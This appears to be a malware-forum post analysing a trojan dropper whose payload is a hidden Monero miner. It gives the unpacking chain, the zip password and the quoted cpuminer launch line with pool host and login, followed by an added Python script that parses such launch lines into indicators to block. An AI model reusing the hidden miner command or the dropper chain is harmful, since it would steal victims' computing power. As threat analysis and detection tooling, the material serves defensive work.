Forum for analysis and discussion about malware.
Trojan muldrop with coin miner as payload.

ikolor wrote (Sun Jan 01, 2017 1:18 pm):
Please make selection ...2017
https://www.virustotal.com/en/file/ca2e ... 483276621/
SFX archive; the next stage is the actual malware dropper, which extracts files to %UserProfile%\Public. The main malware is inside a password-protected zip file called dokinz.zip. This zip file is unpacked by ConsoleApplication1.exe (also dropped by the malware) with the password "dokinzakbar" (hardcoded inside ConsoleApplication1.exe). After unpacking, ConsoleApplication1.exe executes the malicious script NVidiaDriverUpdate.vbs.
TL;DR: it is a cryptocurrency miner configured as

Code:
"NvidiaUpdater.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u firstname.lastname@example.org -p 2101skymagicss -t 1", 0, true

where NvidiaUpdater.exe is a coin miner called "cpuminer-multi".
This email can be found on Google and leads to Magnitogorsk, Russia.
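The miner launch line quoted in the post is a WScript.Shell `.Run` call: the command string, a window style of 0 (hidden window) and `true` (wait for exit). The following triage helper is an added example and not code from the post or from the malware: it pulls every `.Run` call out of a dropped VBScript, tokenizes the command line, maps the cpuminer-multi options (`-a/--algo`, `-o/--url`, `-u/--user`, `-p/--pass`, `-t/--threads`) onto structured indicators (pool host and port, login, password, thread count), and flags a launch as a miner when the window is hidden and the pool uses a stratum scheme or a known mining algorithm. The embedded VBS sample is reconstructed from the single command line quoted above, since the real NVidiaDriverUpdate.vbs is not on the page, and the stratum scheme and algorithm lists are assumptions meant to be extended.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse

# Constructed sample: a WScript.Shell .Run line rebuilt from the command line quoted
# in the post; it is NOT the actual NVidiaDriverUpdate.vbs. The login
# "firstname.lastname@example.org" is the redacted form shown on the page.
SAMPLE_VBS = r'''
Set sh = CreateObject("WScript.Shell")
sh.Run "NvidiaUpdater.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u firstname.lastname@example.org -p 2101skymagicss -t 1", 0, true
'''

# .Run "<command>", <window style>, <wait for exit>  ("" inside the string is an escaped quote)
RUN_RE = re.compile(r'\.Run\s+"((?:[^"]|"")*)"\s*,\s*(\d+)\s*,\s*(true|false)', re.IGNORECASE)

# cpuminer-multi option names; long forms may also appear as --opt=value
FLAG_MAP = {"-a": "algorithm", "--algo": "algorithm",
            "-o": "url", "--url": "url",
            "-u": "login", "--user": "login",
            "-p": "password", "--pass": "password",
            "-t": "threads", "--threads": "threads"}

# Assumed lists of pool protocols and algorithms worth flagging; extend as needed.
POOL_SCHEMES = {"stratum+tcp", "stratum+ssl", "stratum+tls"}
MINER_ALGOS = {"cryptonight", "cryptonight-lite", "scrypt", "sha256d", "x11", "yescrypt"}


@dataclass
class MinerLaunch:
    binary: str
    hidden_window: bool          # .Run window style 0 hides the console
    wait_for_exit: bool
    algorithm: Optional[str] = None
    pool_scheme: Optional[str] = None
    pool_host: Optional[str] = None
    pool_port: Optional[int] = None
    login: Optional[str] = None
    password: Optional[str] = None
    threads: Optional[int] = None
    other_args: List[str] = field(default_factory=list)


def extract_run_calls(vbs_text: str) -> List[Tuple[str, int, bool]]:
    """Return (command, window_style, wait) for each WScript.Shell .Run call in the script."""
    return [(m.group(1).replace('""', '"'), int(m.group(2)), m.group(3).lower() == "true")
            for m in RUN_RE.finditer(vbs_text)]


def tokenize(cmd: str) -> List[str]:
    """Split a command line on whitespace, keeping double-quoted arguments whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]


def parse_miner_launch(cmd: str, window_style: int = 0, wait: bool = False) -> MinerLaunch:
    """Map a cpuminer-style command line onto structured indicators."""
    argv = tokenize(cmd)
    launch = MinerLaunch(binary=argv[0], hidden_window=(window_style == 0), wait_for_exit=wait)
    opts: Dict[str, str] = {}
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg.startswith("--") and "=" in arg:          # --algo=cryptonight
            key, _, val = arg.partition("=")
            i += 1
        elif arg in FLAG_MAP and i + 1 < len(argv):      # -a cryptonight
            key, val = arg, argv[i + 1]
            i += 2
        else:                                            # anything we do not model
            launch.other_args.append(arg)
            i += 1
            continue
        if key in FLAG_MAP:
            opts[FLAG_MAP[key]] = val
        else:
            launch.other_args.append(arg)
    launch.algorithm = opts.get("algorithm")
    launch.login = opts.get("login")
    launch.password = opts.get("password")
    if opts.get("threads", "").isdigit():
        launch.threads = int(opts["threads"])
    if "url" in opts:
        u = urlparse(opts["url"])  # urlparse accepts custom schemes such as stratum+tcp
        launch.pool_scheme, launch.pool_host = u.scheme.lower(), u.hostname
        try:
            launch.pool_port = u.port
        except ValueError:         # non-numeric port in the URL
            launch.pool_port = None
    return launch


def is_miner_launch(launch: MinerLaunch) -> bool:
    """Heuristic: hidden window plus either a stratum pool URL or a known mining algorithm."""
    return launch.hidden_window and (launch.pool_scheme in POOL_SCHEMES
                                     or (launch.algorithm or "").lower() in MINER_ALGOS)


def triage(vbs_text: str) -> List[MinerLaunch]:
    """Extract and parse every .Run launch in a dropped VBScript."""
    return [parse_miner_launch(cmd, style, wait) for cmd, style, wait in extract_run_calls(vbs_text)]


if __name__ == "__main__":
    for launch in triage(SAMPLE_VBS):
        print(f"{launch.binary}: miner={is_miner_launch(launch)} "
              f"pool={launch.pool_host}:{launch.pool_port} login={launch.login} algo={launch.algorithm}")
```

Run it against any extracted dropper script; the pool host, port and login it returns are the indicators worth blocking at the proxy or DNS layer, and the password field is often a per-campaign tag (as in the sample), which makes it a useful pivot between related droppers.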